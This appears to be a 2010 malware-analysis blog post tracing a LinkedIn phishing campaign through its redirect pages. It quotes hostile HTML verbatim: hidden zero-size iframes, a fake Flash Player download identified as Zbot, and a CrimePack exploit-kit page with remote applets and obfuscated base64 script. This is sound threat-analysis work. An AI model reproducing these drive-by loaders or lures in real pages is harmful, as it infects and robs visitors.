As soon as 9/29/2010 it seems that the malguys changed the exploit pack used in LinkedIn phishing massive campaign.
The spam mail was always a “Linkedin like” reminder:
The URL inside refer to http://qfco8kkt.info/
that redirect to http://kerstdisplays.nl/1.html.
At first check this page was
BEFORE
PLEASE WAITING.... 4 SECONDS
<meta http-equiv="refresh" content="4;url=http://medicineni.com" />
<iframe width="0" height="0" src="http://pydukog.co.cc/wiki/index.php?past=2&action=boz&message=168&str=0"></iframe>
http://medicineni.com –> Pharmacy Express website…
then later chaged to
<body>
<a href="http://dewitnieuws.nl/flash_player_07.78.exe"><img
style="border: 0px solid ; width: 499px; height: 158px;" alt=""
src="http://dewitnieuws.nl/1.JPG"></a>
</body><meta http-equiv="refresh" content="4;url=http://dewitnieuws.nl/flash_player_07.78.exe" />
<iframe width="0" height="0" src="http://pydukog.co.cc/wiki/index.php?past=2&action=boz&message=168&str=0"></iframe>
http://dewitnieuws.nl/flash_player_07.78.exe is Zbot.FX (MD5 4f56196d437be7e1bfecefb92b83872d) Anubis Automated Analisys
The common part referred by http://pydukog.co.cc/wiki/index.php?past=2&action=boz&message=168&str=0
took us to crypted code seem belonging to CrimePack exploit kit:
<html><head></head><body>Loading...<applet code="cpak.Crimepack.class" archive="http://pydukog.co.cc/wiki/jar5.php" width="666" height="300"><param name="data" value="http://pydukog.co.cc/wiki/exe.php?x=jar5"></applet><applet code="Exploit.class" archive="http://pydukog.co.cc/wiki/j.php" width="666" height="300"><param name="data" VALUE="http://pydukog.co.cc/wiki/exe.php?x=jjar"></applet><div id="page" style="display: none">ZnVu Y3 R pb24gSnVtcEF 3YXko K Q0Kew0K CXdpbmRvdy5vcGVuK Cdo dHRwOi8vd 3 d3Lmdvb2d s ZS5jb20 vNDA0Lyc sICd fc2VsZ icpOw0KfQ0KDQpmd W5 jdGlvbiB K R FQoKQ0Ke w0K CXRye Q0KCXs JDQ oJCXZhciB 1 ID0 g J2h 0dHA6IC1KLWp hciA tSlxcXFxw
..
..
aWYgKF9JRTcgJiYgX1hQKQ 0Kew0KC XNldF R pb WV vdXQg KE hDUC wgdGlt KTs N Cgl0aW 0gKz0 gMTAw MDsNCn 0 NCg0KaWYgKF9J RTYpDQp7DQoJc2V0VGl tZW91dCA o TURBQywgdG ltK TsNCgl 0 aW0gKz0g M TAwMDs NCn0NC g 0KD Q ppZiAodGlt I D4 gMCkg dGlt ICs9IDEw MDAwOw0KDQpzZXRUaW1lb3 V 0IChKd W1w QXdhe SwgdG ltK TsNCg== </div><script type="text/javascript" src="http://pydukog.co.cc/wiki/js.php"></script></body></html>
Further analysis will follow...
No comments:
Post a Comment